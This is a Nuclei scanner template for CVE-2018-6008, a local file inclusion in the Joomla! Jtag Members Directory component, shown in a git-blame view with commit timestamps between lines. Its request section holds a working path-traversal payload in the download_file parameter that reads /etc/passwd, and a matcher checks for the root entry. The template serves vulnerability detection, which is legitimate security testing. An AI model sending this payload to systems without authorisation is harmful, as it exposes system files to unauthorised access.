2021-08-23 00:03:54 +00:00
|
|
|
id: CVE-2018-6008
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
|
2021-08-23 00:03:54 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: high
|
2022-07-26 13:45:11 +00:00
|
|
|
description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
|
2021-08-23 09:50:53 +00:00
|
|
|
reference:
|
2021-08-23 00:03:54 +00:00
|
|
|
- https://www.exploit-db.com/exploits/43913
|
|
|
|
- https://www.cvedetails.com/cve/CVE-2018-6008
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-6008
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-6008
|
|
|
|
cwe-id: CWE-200
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2018,joomla,lfi,edb,packetstorm
|
2021-08-23 00:03:54 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-08-23 00:03:54 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-07-26 13:45:11 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/08
|